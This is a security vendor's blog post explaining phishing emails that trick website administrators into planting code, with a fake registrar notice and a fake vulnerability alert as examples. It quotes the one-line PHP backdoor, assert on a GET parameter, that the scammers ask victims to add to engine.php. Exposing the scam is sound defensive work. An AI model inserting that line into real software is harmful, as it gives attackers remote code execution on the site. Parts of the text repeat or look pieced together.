Phishing for system administrators
Thursday, June 22, 2017
Office employees are favourite targets for scammers. Indeed, bombarded daily by so much email, they may have a hard time recognising fraudulent messages. But this doesn't imply that attackers aren't interested in other employee categories. Let's take a look at a scam message for system administrators:
Since we really do offer our customers the Internet service Dr.Web AV-Desk, it is quite possible that an email with a domain with a similar name could appear in one of our mailboxes, describing some sort of problem.
But let's take a closer look. The email is addressed to the marketing department. What does that have to do with matters of site ownership? And instead of requesting a document from us that would confirm our right of ownership, we are prompted to create a file. The file’s contents aside, if we have indeed hijacked the site, we will easily create the requested file.
As usual, scammers expect panic and turmoil—the deadline is set to three days and not a minute longer. By the way, the message was received on June 2, so all the required steps were to be performed within just one day.
Now let's do a web search to check the phone numbers. It appears that none of them is used by any site registration agency.
It should also be noted that messages of this kind have been circulating across the Web for some time. The trick is that the sender address is valid. And criminals expect that the users they target will have added a backdoor into the code of their site. If a site file containing assert is opened, the code transmitted with the parameters will be executed.
I checked the address and it turned out that the message was indeed from a registration agency. So I went to do what was being required of me. It took me about ten minutes to create the file and make it available on the website. I was in a hurry to reply to the registration authority—after all, I could lose the domain name. So I pressed Reply to report that the task had been completed and the file was available on my site. Then I sent the message.
Do you think that right then and there I realised that the email was sent by a crook? I did say that I checked the email and it was sent by a registration agency, so I was following the standard routine. And then I received a reply.
We didn't reply to this message. Unfortunately, some people do otherwise.
The task is easy: create a directory containing a file and add one string into the file.
The trick is in asking users to create a file containing seemingly harmless PHP code. However, if one reads the description of the assert function, they will realise that it will enable perpetrators to execute the code they need.
https://habrahabr.ru/post/265513
https://habrahabr.ru/post/265515
So I deleted the file from my site.
After that I received a reply to the message I had sent in response to the email that instructed me to host a file on my site.
Quotation:
Dear Sir,
The original message you received was sent to you by fraudsters and has nothing to do with R01.
It is not recommended that you deploy the specified code because it will enable attackers to freely alter the contents of your website. If, however, you have deployed the code, we recommend that you scan your site for malware and/or restore it to its original state prior to deploying from a backup.
Best regards,
...
There are other phishing tricks geared toward system administrators.
We hereby notify you that our researchers have discovered a critical vulnerability in your website. A flaw in the data-filtering routines can enable attackers to gain access to your site's database.
We hereby notify you that our researchers have discovered a critical vulnerability in your website. A flaw in the data-filtering routines can enable attackers to gain access to your site's database.
To close the vulnerability, in a text editor open the file: /engine/engine.php, and at the very top after the line:
<?php>
добавьте:
assert($_GET[REQUEST]);
The Anti-virus Times recommends
Don't switch off your brain when you read emails. You can filter out most phishing emails by using simple logic and checking whether they meet various formal criteria: valid sender address, appropriate salutation, and signature with contact information. Otherwise, you can send money to criminals or (as in this case) roll out a red carpet for them with your own hands.
And, of course, do not forget to use an anti-spam filter, which will protect you from unsolicited emails, scams, and encryption ransomware.
Tell us what you think
To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.
Comments
Неуёмный Обыватель
04:12:14 2018-07-22
vasvet
07:56:00 2018-07-20